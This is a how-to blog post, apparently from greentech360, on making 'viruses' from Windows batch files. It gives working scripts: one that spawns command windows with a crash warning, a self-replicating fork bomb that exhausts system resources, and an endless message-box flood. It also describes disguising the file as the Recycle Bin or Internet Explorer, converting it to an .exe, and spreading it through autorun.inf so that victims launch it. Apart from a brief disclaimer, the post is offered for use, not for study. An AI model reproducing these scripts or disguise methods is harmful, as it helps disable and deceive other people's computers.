Let’s create a virus in few minutes….


Ok guys, am not responsible for the consequences of your actions, just providing knowledge on how to do these things. I believe you have seen a .bat file at least once in a system. It’s a file with an icon of overlapping gear systems. The .bat files are called batch files in all the things they do they can also be used to create malicious codes in other words called virus. If these codes are written in the Notepad text editor and saved with an extension .bat file they can really cause damage to a computer or network. They can cause system to crash and file to multiply vigorously. 





NOW TO MAKE A BATCH:
1) open NOTEPAD
2) start with the following script
@echo off
 followed with your commands
3) save as FILENAME.bat
4) Batch file has already been created

Example 1: let’s create a batch file which will open the CMD prompt in 4 times and give out the message “your computer will crash”. 

@echo off
msg * YOUR COMPUTER WILL CRASH
start
start
start
start

Example 2: This will crash your computer for really not fun 

@echo off
:loop
start joke.bat
Goto loop



Example 3: Try this at your own risk 

@echo off
echo You have contacted greentech360.
echo.
pause
cls
echo Searching for greentech360
echo.
pause
msg * greentech360 found
:a
msg * greentech360 is coming
msg * greentech360 is coming
msg * greentech360 is coming
msg * greentech360 is coming
msg * greentech360 is coming
msg * greentech360 is coming
goto a

The message box can't be deleted unless you reboot the computer, and the funny thing is, when the person tries to hide the message box in the corner of the screen where someone can't see it, every few minutes it'll pop up in the middle of the screen.
For advanced users of the batch files you can choose to convert the files to .exe by using compilers available online. The batch files tricks can be used also to create autorun virus by just saving the file as autorun.inf. After creating a .bat file you can easily change the file icon on the desktop by just going to properties and give it a fake name such as Recycle Bin or Internet Explorer and once the user click the file the damage will be done on the system make sure you delete the original icon on the desktop and the file is a shortcut. Please it is illegal to practice these things without the prior concern of the owner of the system has fun. More tricks to come keep visiting greentech360. Please share this pals to increase my traffic.